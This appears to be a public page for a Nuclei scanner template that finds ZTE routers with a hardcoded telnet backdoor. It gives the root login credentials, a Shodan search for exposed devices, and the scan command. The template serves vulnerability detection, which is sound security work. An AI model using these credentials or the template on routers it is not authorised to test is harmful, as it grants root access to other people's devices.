ZTE Router Panel - Detect

ID: backdoored-zte

Severity: critical

Author: its0x08

Tags: edb,network,zte,telnet,backdoor,router,tcp

Description

Multiple ZTE router panels were detected. These routers have a telnet-hardcoded backdoor account that spawns root shell.

YAML Source

id: backdoored-zte

info:
  name: ZTE Router Panel - Detect
  author: its0x08
  severity: critical
  description: |
    Multiple ZTE router panels were detected. These routers have a telnet-hardcoded backdoor account that spawns root shell.
  reference:
    - https://www.exploit-db.com/ghdb/7179
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-912
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"ZTE Corporation"
  tags: edb,network,zte,telnet,backdoor,router,tcp
tcp:
  - host:
      - "{{Hostname}}"
    port: 23
    inputs:
      - data: "root\r\n"
      - data: "Zte521\r\n\r\n"
        read: 1024

    matchers:
      - type: word
        words:
          - "BusyBox"

    extractors:
      - type: regex
        regex:
          - '[A-Z]{1,}[0-9]{3,4}'
# digest: 4a0a004730450220240bbf4f1320bd21c5b220db8ea127413ce239b51366dfc4ab4ecff2a76728a80221009d786c0818c5b225d521e5123f434b0d58ea5c85d4d8632e14ca94656cde1ff1:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "network/backdoor/backdoored-zte.yaml"

View on Github